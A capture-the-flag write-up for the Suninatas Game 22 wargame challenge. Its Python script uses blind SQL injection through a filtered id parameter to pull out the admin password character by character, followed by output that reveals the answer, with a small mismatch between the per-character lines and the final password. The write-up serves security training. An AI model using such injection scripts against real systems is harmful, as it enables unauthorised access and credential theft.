Suninatas Game 22

Posted on Edited on In Views: Disqus:

challenges

Game 22

This is a blind SQL injection challenge with heavy filtering. Keywords blocked include: select, union, or, whitespace, by, having, from, char, ascii, left, right, delay, 0x.

The goal is to find the admin’s password. Start with credentials guest/guest to obtain a valid session.

Use a Python script to extract the password character-by-character via blind SQL injection:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
import requests
import string

url = "http://suninatas.com/challenge/web22/web22.asp"
cookies = {
    "ASP.NET_SessionId": "...",
    "auth_key": "...",
    # ... other session cookies
}

charset = string.ascii_letters + string.digits + "!@#$%^&*()_+"
password = ""

for i in range(1, 31):
    found_char = False
    for char in charset:
        # Test: substring(pw, index, length) = char
        payload = f"'and(substring(pw,{i},1)='{char}')--"
        params = {'id': 'admin' + payload, 'pw': 'a'}

        try:
            r = requests.get(f"{url}?id={params['id']}&pw={params['pw']}", cookies=cookies)
            if "OK" in r.text:
                password += char
                print(f"[+] Found char at index {i}: {char}")
                found_char = True
                break
        except Exception as e:
            print(f"[!] Error: {e}")

    if not found_char:
        break

print(f"[SUCCESS] Final Password: {password}")

Running the script reveals the admin password:

1
2
3
4
5
6
7
8
9
10
11
12
13
[+] Found char at index 1: N
[+] Found char at index 2: 1
[+] Found char at index 3: c
[+] Found char at index 4: 3
[+] Found char at index 5: B
[+] Found char at index 6: i
[+] Found char at index 7: l
[+] Found char at index 8: n
[+] Found char at index 9: l
[+] Found char at index 10: )
[+] Found char at index 11: +
[+] Found char at index 12: +
...
N1c3Bilnl)